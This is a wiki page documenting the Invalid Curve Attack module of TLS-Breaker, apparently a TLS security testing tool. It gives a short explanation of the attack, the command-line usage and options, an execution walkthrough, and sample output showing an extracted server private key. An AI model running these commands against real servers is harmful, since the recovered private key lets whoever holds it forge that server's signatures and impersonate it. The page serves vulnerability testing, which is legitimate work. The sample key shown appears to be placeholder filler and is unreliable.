Skip to content

Invalid Curve Attack

Jump to bottom
subramanya-shetty edited this page Sep 14, 2022 · 12 revisions

Elliptical curve cryptography (ECC) is built on cyclic groups in which individual elements are represented as points on a finite plane. An elliptic curve is a set of points located over a finite field. In an EC key exchange, the client selects a point on the elliptic curve and sends it to the server. The server then derives the key by multiplying the received point with its secret.

The attack is called an invalid curve attack because the attacker sends points that are outside of the original secure curve. The attacker then forces the server to execute the computation on a different curve with a smaller order. Due to this reason (smaller order) the attacker can perform simple guesses to get the resulting shared secret/ Point.

If an implementation accepts elliptic curve points from an invalid elliptic curve, it can be attacked with an invalid curve attack and the server’s private key can be extracted.

Invalid curve attack in TLS-Breaker attempts to send invalid points to the server and perform a valid handshake. If this is possible and the implementation accepts the invalid point, your implementation is vulnerable. Otherwise, the implementation rejects the incoming point and it is not vulnerable.

If you want to get more information on this topic, please refer to the link below.

https://www.nds.ruhr-uni-bochum.de/media/nds/veroeffentlichungen/2015/09/14/main-full.pdf

Command

java -jar InvalidCurve.jar  -pcap (PCAP file name)

OR

java -jar InvalidCurve.jar  -connect (Server to connect)

Parameters/Options

-cipher:
  TLS cipher suites to use, divided by a comma. 
  e.g. TLS_RSA_WITH_AES_128_CBC_SHA,TLS_RSA_WITH_AES_256_CBC_SHA
-config
  This parameter allows you to specify a default TlsConfig
-connect
  Who to connect to. Syntax: localhost:4433
-curve_field_size
  Curve field size. 32 works for 256bits.
  Default: 32
-debug
  Show extra debug output (sets logLevel to DEBUG)
  Default: false
-ephemeral
  If set to true, the attack with ephemeral cipher suites (ECDHE) is attempted.
  Default: false
-executeAttack, -execute_attack
  If this value is set the Attack is not only Tested, but also executed
  (WARNING)
  Default: false
-h, -help
  Prints usage for all the existing commands.
-key_offset
  Offset of the first attempted secretkey
  Default: 0
-keylogfile
  Path to the keylogfile
-named_curve :  
  Named curve to be used
  Default: SECP256R1
  Possible Values: [SECT163K1, SECT163R1, SECT163R2, SECT193R1, SECT193R2, SECT233K1, SECT233R1, SECT239K1, SECT283K1, SECT283R1, SECT409K1, SECT409R1, SECT571K1, SECT571R1, SECP160K1, SECP160R1, SECP160R2, SECP192K1, SECP192R1, SECP224K1, SECP224R1, SECP256K1, SECP256R1, SECP384R1, SECP521R1, BRAINPOOLP256R1, BRAINPOOLP384R1, BRAINPOOLP512R1, ECDH_X25519, ECDH_X448, FFDHE2048, FFDHE3072, FFDHE4096, FFDHE6144, FFDHE8192, EXPLICIT_PRIME, EXPLICIT_CHAR2, GREASE_00, GREASE_01, GREASE_02, GREASE_03, GREASE_04, GREASE_05, GREASE_06, GREASE_07, GREASE_08, GREASE_09, GREASE_10, GREASE_11, GREASE_12, GREASE_13, GREASE_14, GREASE_15]
-pcap
  Location of the pcap file that will be used for the Invalid Curve
  Attack.
-point_format
  The format used for the public key
  Default: UNCOMPRESSED
  Possible Values: [UNCOMPRESSED, ANSIX962_COMPRESSED_PRIME, ANSIX962_COMPRESSED_CHAR2]
-protocol_flows
  Number of Protocol flows
  Default: 15
-quiet
  No output (sets logLevel to NONE)
  Default: false
-renegotiation
  If set to true, the attack will be carried out in a renegotiation handshake
  Default: false
-server_name
  Server name for the SNI extension.
-server_type
  Allows to switch between a normal vulnerable server type and an Oracle
  server type (for oracle a slightly different algorithm is needed).
  Default: NORMAL
  Possible Values: [NORMAL, ORACLE]
-skipConnectionCheck, -skip_connection_check
  If set to true, the Attacker will not check if the target is reachable.
  Default: false
-starttls
  Starttls protocol
  Default: NONE
  Possible Values: [NONE, FTP, IMAP, POP3, SMTP]
-version
  Highest supported protocol version
  Possible Values: [SSL2, SSL3, TLS10, TLS11, TLS12, TLS13, TLS13_DRAFT14, TLS13_DRAFT15, TLS13_DRAFT16, TLS13_DRAFT17, TLS13_DRAFT18, TLS13_DRAFT19, TLS13_DRAFT20, TLS13_DRAFT21,TLS13_DRAFT22, TLS13_DRAFT23, TLS13_DRAFT24, TLS13_DRAFT25, TLS13_DRAFT26, TLS13_DRAFT27, TLS13_DRAFT28, DTLS10, DTLS12, GREASE_00, GREASE_01, GREASE_02, GREASE_03, GREASE_04, GREASE_05, GREASE_06, GREASE_07, GREASE_08, GREASE_09, GREASE_10, GREASE_11, GREASE_12, GREASE_13, GREASE_14, GREASE_15]

Example

Running an attack based on the recorded connections stored in “Sample_pcap.pcapng”.

 java -jar InvalidCurve.jar -pcap “Sample_pcap.pcapng” -named_curve SECP521R1

Attacking a known server that uses SECP521R1 (let's say localhost:4433)

 java -jar InvalidCurve.jar -connect localhost:4433 -named_curve SECP521R1 -executeAttack

Execution of the attack

Part 1:

Ensure that the server which is used for the attack is up and running.

Part 2:

  1. Open the terminal from the “apps” folder.
  2. Execute the command mentioned in the command section

Part 3:

Executing the command with the "-connect" option will start the attack, Wait for the attack to finish, it might take a while.

OR

Executing the command with the pcap file, a list of servers that may be potentially vulnerable to the Invalid curve attack is displayed.

If the server count is 1: The user is directly allowed to check the vulnerability.

Found 1 server from the pcap file.
┌─────────────┬────────────────────┬────────────────────────────────────────────────┐
│Server Number│Host Address        │Hostname                                        │
├─────────────┼────────────────────┼────────────────────────────────────────────────┤
│            1│127.0.0.1:4433      │-                                               │
│             │                    │                                                │
└─────────────┴────────────────────┴────────────────────────────────────────────────┘
Do you want to check the vulnerability of the server? (y/n):

If the server count is 2 or more: The user can select a server out of that list to check the vulnerability or the user can check the vulnerability of all the servers by selecting option “a”.

Vulnerability check:

Selecting vulnerable checks will start checking for the vulnerability of the server.

If the server is vulnerable, users are provided with options on whether to start or end the attack.

On selection ‘Y’ execution of the attack starts, selecting ‘N’ will exit from the execution.

After selecting ‘Y’ wait for the attack to finish, it might take a little time.

Output

The private key of the server is obtained along with the number of queries and time required for the attack. Also, the base64 version of a private key is displayed.

 Number of server queries: 12768
 The time needed for the attack: 209 seconds
 Resulting plain private key: 2240907000157139574000861657719155206999610426911206999610426911222409070001571395740008616577191552
 Resulting encoded private key:
 -----BEGIN PRIVATE KEY-----
 MGACAQAwEAYHKoZIzj0CAQYFK4EEACMESTBHAgEBBEIApyJtQE67vtKYOiKRZAsJ
 K4EEACMESTBHAgEBBEIApyJtQE67vtKYOiKRZAsJMGACAQAwEAYHKoZIzj0CAQ0=
 -----END PRIVATE KEY----

Obtained server private key can be used to generate valid server signatures.

Clone this wiki locally